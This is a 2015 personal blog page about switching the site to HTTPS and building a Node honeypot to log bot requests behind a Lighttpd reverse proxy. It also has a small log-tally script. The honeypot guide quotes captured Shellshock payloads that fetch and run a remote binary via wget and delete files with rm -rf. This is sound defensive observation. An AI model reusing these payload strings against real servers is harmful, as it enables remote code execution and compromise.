Wednesday, April 29, 2015

Full site HTTPS is here!


Now you can browse all of these silly pages securely, without fear of certain government agencies discovering your appreciation for Nicolas Cage!

Check out my SSL test ratings (all A+s!).

Wednesday, April 22, 2015

Catching Spam Bots In the Act with Node

Have you ever been searching through your web server's logs and noticed Chinese IPs making nasty-looking requests like these?


    GET /cgi-bin/bash HTTP/1.1
    GET /cgi-bin/php HTTP/1.1
    GET /rom-0 HTTP/1.1


    () { :;};/usr/bin/perl -e 'print \"Content-Type: text/plain\\r\\n\\r\\nXSUCCESS!\";system(\"wget -O /tmp/;curl -O /tmp/;perl /tmp/;rm -rf /tmp/*\");'"

Or even _this_?

    () { :; }; /bin/bash -c \"rm -rf /tmp/*;echo wget http://123.456.7.8:911/java -O /tmp/China.Z-rmeo >> /tmp/;echo echo By China.Z >> /tmp/;echo chmod 777 /tmp/China.Z-rmeo >> /tmp/;echo /tmp/China.Z-rmeo >> /tmp/;echo rm -rf /tmp/ >> /tmp/;chmod 777 /tmp/;/tmp/\"

Though most current web servers are immune to these simple attacks (assuming, of course, that you've been keeping your packages updated), it's often interesting to see how bots attempt to exploit vulnerable services running on web servers. In some cases, such as the log excerpts above, it's easy to see how this is achieved: the user-agent is crafted to exploit CVE-2014-6271 (AKA Shellshock), which results in some commands being run that turn our precious server into a mindless zombie :(

However, in other cases, this information is not as apparent. The default logging configuration for most web servers doesn't include other data that could potentially be used as an attack vector, such as HTTP headers! Therefore, we'll have to write our own script to collect and log this data from such nasty requests.

You'll need to either write a script that listens for HTTP requests and writes all those juicy details to a log file in whatever language you like (Python, PHP, Ruby, even a Perl CGI script), or find one out on the net somewhere. I'm just going to reuse one of my old projects for this, which just so happens to be written in Node. Here's the adapted version.

If you do decide to write your own script, make sure that it does the following:
  1. Accepts all incoming HTTP connections.
  2. Logs the details of those connections to a file.
  3. Returns 200 as the response code (you attract more bots with honey than with vinegar, so make the request appear to succeed).
  4. Is watertight and ready to face the incoming nastiness (wouldn't want to inadvertently become part of the botnet :P).
You may also want to note some URLs that these bots seem to check regularly, since we'll need them later for our web server configuration, though I'll include some examples in this post.

I'm going to set this up on my auxiliary server, which also sits in a "residential" IP space and gets a fair amount of these bots as a result.

On to the configuration.
In your web server's configuration, set up a reverse proxy to whatever port your script is listening for requests on.

Here's one of mine (I run Lighttpd):

    $HTTP["url"] == "/cgi-bin/test.cgi" {
        proxy.server = ( "" => ( (
            "host" => "",
            "port" => 8082
        ) ) )
    }

Pretty straightforward. We take all requests for /cgi-bin/test.cgi and proxy them to our script, which in this case is running on port 8082 on the local machine. 
Apply the configuration and use your favorite command line utility to make a request to your shiny new reverse proxy.
Here's an example output from mine:
    {
        "fi_timeStamp": "2015:04:22:06:01:55",
        "fi_requestIP": "",
        "fi_method": "GET",
        "req_headers": {
            "accept": "text/html, application/xhtml+xml, */*",
            "user-agent": "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2; WOW64; Trident/6.0)",
            "host": "123.456.7.8:80",
            "authorization": "Basic Og==",
            "x-forwarded-for": "432.10.54.21",
            "x-host": "123.456.7.8:80",
            "x-forwarded-proto": "http"
        }
    }

Once everything is working, just sit back, relax, and keep an eye on your logs :)
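
If staring at raw JSON lines gets old, a small tally script helps. This sketch assumes the one-object-per-line format and `fi_requestIP` field from the example output above; tweak the field names if your script logs differently.

```javascript
// Tally requests per IP from a log of one-JSON-object-per-line entries.
function topOffenders(logText) {
  const counts = {};
  for (const line of logText.split('\n')) {
    if (!line.trim()) continue;
    try {
      const ip = JSON.parse(line).fi_requestIP || 'unknown';
      counts[ip] = (counts[ip] || 0) + 1;
    } catch (e) { /* skip partially written lines */ }
  }
  // most frequent first
  return Object.entries(counts).sort((a, b) => b[1] - a[1]);
}

const sample = [
  '{"fi_requestIP":"203.0.113.9","fi_method":"GET"}',
  '{"fi_requestIP":"203.0.113.9","fi_method":"GET"}',
  '{"fi_requestIP":"198.51.100.4","fi_method":"POST"}'
].join('\n');
console.log(topOffenders(sample)); // [ [ '203.0.113.9', 2 ], [ '198.51.100.4', 1 ] ]
```

In real use you'd read the log with `fs.readFileSync` instead of the inline sample; the sample IPs are documentation addresses, not real spammers.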
UPDATE: I'll be working to keep an active list of spammer IPs available. I'll post another update when it's up.